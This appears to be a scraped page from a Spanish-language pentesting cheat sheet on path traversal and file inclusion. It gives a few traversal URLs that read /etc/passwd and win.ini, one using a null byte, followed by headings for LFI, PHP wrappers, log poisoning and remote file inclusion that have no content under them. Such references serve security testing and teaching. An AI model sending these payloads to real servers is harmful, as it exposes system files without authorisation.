Path traversal & file inclusion
Path traversal
http://<target>/index.php?page=../../../<directory>/<file>
http://<target>/index.php?page=../../../etc/passwd
http://<target>/index.php?page=../../../windows/win.iniNull byte
http://<target>/index.php?page=../../../etc/passwd%00Local File Inclusion (LFI)
Payloads
Linux/Unix
Windows
Fuerza bruta
Wfuzz
FFuF
PHP wrappers
Wrapper php://filter
Wrapper data://
Local File Inclusion (LFI) a Remote Code Execution (RCE)
Wrapper expect://
Wrapper input://
Wrapper data://
File upload
Log poisoning
Archivos de sesión de PHP
Remote File Inclusion (RFI)
Remote File Inclusion (RFI) a Remote Code Execution (RCE)
HTTP
FTP
SMB
Metasploit
Última actualización